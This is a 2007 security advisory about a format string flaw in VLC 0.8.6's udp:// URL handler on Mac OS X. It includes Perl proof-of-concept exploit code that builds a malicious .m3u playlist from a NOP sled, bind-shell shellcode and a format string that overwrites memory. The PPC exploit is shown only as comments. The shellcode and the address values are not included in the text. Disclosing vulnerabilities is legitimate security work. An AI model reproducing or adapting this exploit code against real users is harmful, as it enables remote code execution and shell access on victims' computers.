VLC Media Player UDP URL Handler Format String Vulnerability
3 Jan. 2007
Summary
VideoLAN is "a software project, which produces free software for video, released under the GNU General Public License. The main product is the cross-platform VLC media player - a highly portable multimedia player for various audio and video formats".
A format string vulnerability exists in the handling of the udp:// URL handler. By supplying a specially crafted string, a remote attacker could cause an arbitrary code execution condition, under the privileges of the user running VLC.
Vulnerable Systems:
* VLC version 0.8.6 for Mac OS X
* Previous versions and other platforms might be affected
Proof of concept:
The exploit(s) provided will create a M3U file, which can be locally opened or served remotely via web server. The exploit source code includes notes and other comments about the different options available. Both x86 and PowerPC versions are provided.
Exploit x86:
#!/usr/bin/perl
#
# http://www.digitalmunition.com/VLCMediaSlayer-x86.pl
# Code by Kevin Finisterre kf_lists[at]digitalmunition[dot]com
#
# This exploit will create a malicious .m3u file that will cause VLC Player for OSX to execute arbitrary code.
#
printf "writing to file: %s\n", $outfile;
open(PWNED,">$outfile");
print PWNED "#EXTM3U\n" . "#EXTINF:0,1-07 " . "\x90" x 50 . $bindshell . "\n" .
"udp://--" . pack('l', $writeaddr+2) . pack('l', $writeaddr) .
$format . "i" x (999 - length("Can't get file status for ") ) . "\n";
close(PWNED);
Exploit PPC:
#!/usr/bin/perl
#
# http://www.digitalmunition.com/VLCMediaSlayer-ppc.pl
# Code by Kevin Finisterre kf_lists[at]digitalmunition[dot]com
#
# This is just a vanilla format string exploit for OSX on ppc. We overwrite a saved return addy with our shellcode address.
# This code currently overwrites the saved return addy with the stack location of our shellcode.
#
# This exploit will create a malicious .m3u file that will cause VLC Player for OSX to execute arbitrary code.
#
